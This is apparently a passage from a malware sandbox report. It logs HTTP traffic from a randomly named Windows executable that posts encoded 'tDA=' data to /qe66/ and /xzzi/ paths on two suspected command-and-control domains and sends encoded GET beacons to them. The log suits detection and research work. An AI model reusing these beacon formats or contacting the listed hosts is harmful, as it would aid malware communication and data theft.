                                  Data Ascii: tDA=QlHrfpSPDgxfZac+QlNAsSBFbnwy3a+rdlVmMNk+IL7ZYrGMFpaLf5ovi5L9xoVWOCBFxgX0amoO4SLNBTzoogaBjbqHR+dx7gJba1qhjuWmTohokTON3jz4MtDR7K1swgDky7fLqgeVRHi8jG7x1yH52ouQULnR7UxlFfXVOTQPDfXza+6OZSTAD6kyVAeqeQ==
                                  Jul 13, 2024 00:07:46.762787104 CEST580INHTTP/1.1 404 Not Found
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Date: Fri, 12 Jul 2024 22:07:46 GMT
                                  Server: Apache
                                  Content-Encoding: gzip
                                  Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                  Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.449738217.160.0.106804484C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 13, 2024 00:07:48.656337023 CEST811OUTPOST /qe66/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.catherineviskadi.com
                                  Origin: http://www.catherineviskadi.com
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Content-Length: 220
                                  Referer: http://www.catherineviskadi.com/qe66/
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Data Raw: 74 44 41 3d 51 6c 48 72 66 70 53 50 44 67 78 66 44 2f 55 2b 54 47 6c 41 35 43 42 43 48 33 77 79 2b 36 2b 56 64 6c 5a 6d 4d 4d 67 75 4c 34 66 5a 59 4c 32 4d 45 6f 61 4c 63 35 6f 76 70 5a 4c 38 31 6f 56 6e 4f 43 4e 72 78 69 44 30 61 6d 73 4f 34 54 37 4e 42 45 6e 72 72 51 61 44 6f 37 71 46 4d 75 64 78 37 67 4a 62 61 31 75 50 6a 76 2b 6d 51 59 52 6f 6c 79 4f 43 72 54 7a 2f 45 4e 44 52 32 71 31 6f 77 67 44 4b 79 2b 47 75 71 6d 43 56 52 48 53 38 67 54 58 79 38 79 48 37 35 49 76 45 46 71 4b 42 69 46 30 6c 4b 50 44 5a 41 54 45 7a 4c 35 47 70 4c 50 62 5a 4c 53 33 7a 65 39 74 47 59 44 6a 6a 46 61 58 6c 73 79 65 52 6e 4b 2f 32 4a 59 4e 52 32 45 4b 6a 79 72 51 3d
                                  Data Ascii: tDA=QlHrfpSPDgxfD/U+TGlA5CBCH3wy+6+VdlZmMMguL4fZYL2MEoaLc5ovpZL81oVnOCNrxiD0amsO4T7NBEnrrQaDo7qFMudx7gJba1uPjv+mQYRolyOCrTz/ENDR2q1owgDKy+GuqmCVRHS8gTXy8yH75IvEFqKBiF0lKPDZATEzL5GpLPbZLS3ze9tGYDjjFaXlsyeRnK/2JYNR2EKjyrQ=
                                  Jul 13, 2024 00:07:49.323837996 CEST580INHTTP/1.1 404 Not Found
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Date: Fri, 12 Jul 2024 22:07:49 GMT
                                  Server: Apache
                                  Content-Encoding: gzip
                                  Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                  Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  3192.168.2.449739217.160.0.106804484C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 13, 2024 00:07:51.185796022 CEST10893OUTPOST /qe66/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.catherineviskadi.com
                                  Origin: http://www.catherineviskadi.com
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Content-Length: 10300
                                  Referer: http://www.catherineviskadi.com/qe66/
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Data Raw: 74 44 41 3d 51 6c 48 72 66 70 53 50 44 67 78 66 44 2f 55 2b 54 47 6c 41 35 43 42 43 48 33 77 79 2b 36 2b 56 64 6c 5a 6d 4d 4d 67 75 4c 34 58 5a 59 36 57 4d 45 4c 43 4c 64 35 6f 76 6b 35 4c 68 31 6f 56 41 4f 43 46 76 78 69 50 6b 61 67 77 4f 35 78 7a 4e 52 67 4c 72 38 41 61 44 6e 62 71 49 52 2b 63 7a 37 67 5a 66 61 31 2b 50 6a 76 2b 6d 51 61 4a 6f 6c 6a 4f 43 70 54 7a 34 4d 74 44 4e 37 4b 31 41 77 67 37 38 79 36 62 62 72 51 79 56 53 6e 43 38 77 78 50 79 2b 53 48 44 34 49 76 4d 46 71 48 62 69 42 55 54 4b 50 32 32 41 52 59 7a 50 76 48 41 59 63 66 65 63 78 6d 31 41 66 63 69 63 43 58 69 42 4b 54 67 6f 6a 47 36 31 4f 33 43 54 4b 63 4e 69 46 57 38 70 38 63 4e 69 50 53 38 2f 70 6c 66 55 44 56 69 4a 4a 57 52 4e 65 5a 4a 34 68 2b 43 4d 56 4c 32 47 6b 76 57 62 75 51 57 34 68 7a 72 48 44 4b 50 52 47 7a 71 2b 4e 7a 78 4d 65 59 6d 66 73 64 36 36 49 5a 2b 4a 74 64 42 66 4a 57 7a 7a 72 43 4d 63 32 49 67 6c 49 41 59 44 4c 75 4e 69 4c 69 73 47 39 36 72 77 55 69 4b 31 4f 31 4e 64 72 2b 5a 54 56 65 54 41 6b 70 73 79 38 [TRUNCATED]
                                  Data Ascii: tDA=QlHrfpSPDgxfD/U+TGlA5CBCH3wy+6+VdlZmMMguL4XZY6WMELCLd5ovk5Lh1oVAOCFvxiPkagwO5xzNRgLr8AaDnbqIR+cz7gZfa1+Pjv+mQaJoljOCpTz4MtDN7K1Awg78y6bbrQyVSnC8wxPy+SHD4IvMFqHbiBUTKP22ARYzPvHAYcfecxm1AfcicCXiBKTgojG61O3CTKcNiFW8p8cNiPS8/plfUDViJJWRNeZJ4h+CMVL2GkvWbuQW4hzrHDKPRGzq+NzxMeYmfsd66IZ+JtdBfJWzzrCMc2IglIAYDLuNiLisG96rwUiK1O1Ndr+ZTVeTAkpsy8N3Z8rD7lcRSzFx9wsgGZssteRr2+8wfmeLQSVInd316fCKzj7ZSx/MmL+7KZAmKuxbX20KqC/UrgjH2QGd49+SJkZtMsCBBlTJxxTR+ss3NtZykLjFEsi6uwKYZm0dPAafUC0eaMjNQzm1xGSoexdOfMVPEplukhxL8jQfFwq6HLfN4iKqJLBlJ77jT0CfOGg8TyycBrggKLk5fY4H724rheygicyuNu9NZVhhWHJZPaKnhHjblfqtQHU76541+e2mV4Xb8NjPIz13kR326M1Rd7kxETl8/axlmDwzkaXnAHYn12oplx7T7vCyxn1sml0cpymgZNGoGvppoYnwLLdmDsQrBhmNAmT+Wo3UzCj8RqWqKE2bg8He7//XPGX4vohdc3ki0XAOJKor4YZrrM4byjsyu1AcU48YJhr33J1vyBq+qz/t0DUXYoXhsZT1+Qu2RLXUQXmoNtfzC8qGGlK/3XRAG31vei16Bil4l3fNfR79BC7Zv/Wk3X6aX5dosNc1hTfAzloltqF7T6tM8Xnr/KGTZ0DPzjfKttuaOGOaWy0tKZy/TLLQA2baUY/e7jYIj4ostkFyMi+lxa0+LOmSZ4x+rwS9hmDaCnNUMaRXwCpU/QyxxFkyhYXDdkvxMCIhO4+wLmd6eYe4BYQuRXS26NQcWO2w9odp [TRUNCATED]
                                  Jul 13, 2024 00:07:51.868599892 CEST580INHTTP/1.1 404 Not Found
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Date: Fri, 12 Jul 2024 22:07:51 GMT
                                  Server: Apache
                                  Content-Encoding: gzip
                                  Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                  Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  4192.168.2.449740217.160.0.106804484C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 13, 2024 00:07:53.722448111 CEST517OUTGET /qe66/?tDA=dnvLceXALBk3Hr4+RUpDuj1gE1lZ37++NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv/zqChZDwQ/s0nTN9cl2J79+sQIZRijKLgDM=&Y2AhR=fDNdZPHH1hsp8rrp HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Host: www.catherineviskadi.com
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Jul 13, 2024 00:07:54.387881041 CEST770INHTTP/1.1 404 Not Found
                                  Content-Type: text/html
                                  Content-Length: 626
                                  Connection: close
                                  Date: Fri, 12 Jul 2024 22:07:54 GMT
                                  Server: Apache
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  5192.168.2.449742208.91.197.27804484C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 13, 2024 00:08:15.823052883 CEST785OUTPOST /xzzi/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.bfiworkerscomp.com
                                  Origin: http://www.bfiworkerscomp.com
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Content-Length: 200
                                  Referer: http://www.bfiworkerscomp.com/xzzi/
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Data Raw: 74 44 41 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 35 39 72 66 31 37 61 31 55 4f 5a 4d 67 47 38 38 71 50 57 30 74 56 59 38 77 6e 46 75 57 76 5a 6f 63 31 2b 36 77 2b 43 4c 4c 58 74 7a 67 2f 31 58 4c 56 69 70 4a 2f 34 48 56 58 2f 4d 67 67 48 48 68 4d 4a 75 6b 52 76 6d 51 4a 70 46 4c 67 5a 72 7a 6b 4f 4a 63 62 68 34 34 76 67 78 64 64 51 30 68 38 52 59 6c 33 68 50 66 30 53 41 58 4a 37 56 50 6b 4c 37 64 30 41 75 61 67 62 77 64 44 57 34 4b 34 53 46 6e 37 54 52 75 6b 74 6b 79 76 53 49 37 38 45 54 44 4c 72 77 45 67 4b 5a 55 48 57 71 63 4e 61 63 4d 38 76 73 75 5a 2b 48 6b 42 51 71 69 61 4d 62 6a 67 3d 3d
                                  Data Ascii: tDA=wA7ycEIu+ovI59rf17a1UOZMgG88qPW0tVY8wnFuWvZoc1+6w+CLLXtzg/1XLVipJ/4HVX/MggHHhMJukRvmQJpFLgZrzkOJcbh44vgxddQ0h8RYl3hPf0SAXJ7VPkL7d0AuagbwdDW4K4SFn7TRuktkyvSI78ETDLrwEgKZUHWqcNacM8vsuZ+HkBQqiaMbjg==


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  6192.168.2.449743208.91.197.27804484C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 13, 2024 00:08:18.355432034 CEST805OUTPOST /xzzi/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.bfiworkerscomp.com
                                  Origin: http://www.bfiworkerscomp.com
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Content-Length: 220
                                  Referer: http://www.bfiworkerscomp.com/xzzi/
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Data Raw: 74 44 41 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 37 64 62 66 6d 4d 4f 31 46 65 59 2b 6c 47 38 38 6b 66 57 76 74 56 55 38 77 6d 42 2b 57 35 78 6f 63 55 4f 36 78 2f 43 4c 49 58 74 7a 31 50 31 53 50 56 69 33 4a 2f 38 50 56 53 48 4d 67 67 44 48 68 4a 31 75 6b 41 76 35 52 5a 70 44 44 41 5a 74 33 6b 4f 4a 63 62 68 34 34 76 46 55 64 5a 30 30 68 50 5a 59 33 69 56 4d 57 55 53 44 57 4a 37 56 59 55 4c 2f 64 30 41 51 61 68 33 4b 64 42 75 34 4b 35 69 46 67 75 7a 53 68 6b 74 6d 76 2f 54 47 71 74 74 39 47 2b 4f 42 50 42 71 36 61 46 65 71 51 72 4c 47 64 4e 4f 37 38 5a 61 30 35 47 5a 65 76 5a 78 53 34 76 78 43 4e 4e 47 72 33 70 4b 4e 43 74 54 4b 49 56 45 42 77 76 73 3d
                                  Data Ascii: tDA=wA7ycEIu+ovI7dbfmMO1FeY+lG88kfWvtVU8wmB+W5xocUO6x/CLIXtz1P1SPVi3J/8PVSHMggDHhJ1ukAv5RZpDDAZt3kOJcbh44vFUdZ00hPZY3iVMWUSDWJ7VYUL/d0AQah3KdBu4K5iFguzShktmv/TGqtt9G+OBPBq6aFeqQrLGdNO78Za05GZevZxS4vxCNNGr3pKNCtTKIVEBwvs=


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  7192.168.2.449744208.91.197.27804484C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 13, 2024 00:08:20.893178940 CEST10887OUTPOST /xzzi/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.bfiworkerscomp.com
                                  Origin: http://www.bfiworkerscomp.com
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Content-Length: 10300
                                  Referer: http://www.bfiworkerscomp.com/xzzi/
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Data Raw: 74 44 41 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 37 64 62 66 6d 4d 4f 31 46 65 59 2b 6c 47 38 38 6b 66 57 76 74 56 55 38 77 6d 42 2b 57 35 4a 6f 63 6d 71 36 78 63 36 4c 4a 58 74 7a 70 66 31 54 50 56 6a 79 4a 37 51 4c 56 54 36 78 67 69 4c 48 67 72 4e 75 7a 45 7a 35 66 70 70 44 63 51 5a 73 7a 6b 4f 51 63 62 78 30 34 76 31 55 64 5a 30 30 68 4a 39 59 6e 48 68 4d 61 30 53 41 58 4a 37 5a 50 6b 4c 48 64 30 4a 72 61 68 43 39 64 31 61 34 4c 5a 79 46 69 64 62 53 6f 6b 74 67 73 2f 53 62 71 74 78 2b 47 36 76 2b 50 42 65 41 61 48 43 71 54 64 6a 61 48 39 36 50 76 49 71 59 37 32 78 4f 72 4a 34 54 37 38 78 58 4e 63 36 63 69 74 50 75 41 2f 71 68 66 67 55 77 70 36 2f 35 62 34 5a 41 73 69 49 33 61 68 79 32 58 59 43 6c 73 75 59 6f 4c 52 57 38 47 58 6c 66 46 4a 51 69 52 57 39 4a 42 69 71 48 4b 61 6f 4b 36 49 77 39 7a 4b 71 64 6a 72 44 57 31 5a 46 4b 44 54 57 43 7a 4d 71 62 39 6e 64 65 54 6b 62 65 41 51 75 41 45 6c 51 49 6e 44 6a 34 73 45 77 49 37 71 45 71 51 45 6f 2f 34 30 48 74 4c 52 34 63 50 45 43 49 74 6d 46 4a 7a 38 [TRUNCATED]
                                  Data Ascii: tDA=wA7ycEIu+ovI7dbfmMO1FeY+lG88kfWvtVU8wmB+W5Jocmq6xc6LJXtzpf1TPVjyJ7QLVT6xgiLHgrNuzEz5fppDcQZszkOQcbx04v1UdZ00hJ9YnHhMa0SAXJ7ZPkLHd0JrahC9d1a4LZyFidbSoktgs/Sbqtx+G6v+PBeAaHCqTdjaH96PvIqY72xOrJ4T78xXNc6citPuA/qhfgUwp6/5b4ZAsiI3ahy2XYClsuYoLRW8GXlfFJQiRW9JBiqHKaoK6Iw9zKqdjrDW1ZFKDTWCzMqb9ndeTkbeAQuAElQInDj4sEwI7qEqQEo/40HtLR4cPECItmFJz8q2d6pU4Ll7VU2sZsAI1N9jsSxu+eTj6YbKXJv8fXXQqvG3BbGJskhF9Ve/wnRYhL+vXXqZZNGcGKVV7oYforgpXJpV3bcZ7DCMeRW7Q4foENPhAjoU1k/cFL2mm9gvpNiCf9X3hjL7s24pdlVzpUBejJjFPnHCKCLtRG8Qg2CQkZVaQe1zHyLzOMYQoYnUmTRlCeEKfq3CRh32Ny3Ni9lv8d+qKbPpzr/5XQKeEO3VWB6H0w96rKUdeKp7EoPDK2c/T03xZ9XKxqd47zb5IXLF0gw1CqvJoxn4C0BzUPdwFbrGTNJ7LEZyjUs1OgzEVCU+NYuhfr1wLdGLMIliXxTxIQ4XNR2rQzj+I1Su0kk1PiIl1P7lYqE1W8q7cpo3do02/UjfJugRn+Z3T4OqN905CBUBc40YcJjXZVlxb6yt0SulegB5Vyqw0Tkv5hbbxvtVC46sNp4Lg+/5tJTQW6EyDP5ReN2c/SOL9Qw/R9yo8Bk2QsMcpuIeWbe6f9fRkuy+olxap3NUgeloDC00V39WiomQYDqW1N+FpmL3yF9wb9tS0EzK7kFus2Mv/5VI365zo1jlEyxmNbHS04P9WqPbVzcBxdz1bCjN+OrYYRhDeL4DEjI19X+KLct1xHqmHD1cEqqeaEC7VViPP16JAXO8lYaiE6AnBA0s [TRUNCATED]


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  8192.168.2.449745208.91.197.27804484C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 13, 2024 00:08:23.628108978 CEST515OUTGET /xzzi/?Y2AhR=fDNdZPHH1hsp8rrp&tDA=9CTSfwlM5YWl8fvbrbSkFth60mtnncbW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/S4FmCg8fmWLidol7jMU2H7Flt+5ZogJ/ZG4= HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Host: www.bfiworkerscomp.com
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Jul 13, 2024 00:08:25.762509108 CEST1236INHTTP/1.1 200 OK
                                  Date: Fri, 12 Jul 2024 22:08:11 GMT
                                  Server: Apache
                                  Set-Cookie: vsid=932vr468367692593632941; expires=Wed, 11-Jul-2029 22:08:12 GMT; Max-Age=157680000; path=/; domain=www.bfiworkerscomp.com; HttpOnly
                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_GxXnhxAHvJJQQbg+i046xSSYNXToIv/EUGyUz7+5r5WmJ78vAbXibB79PVxPo9cfqAjtXwBJCcQPwkEU+Wr3OA==
                                  Transfer-Encoding: chunked
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
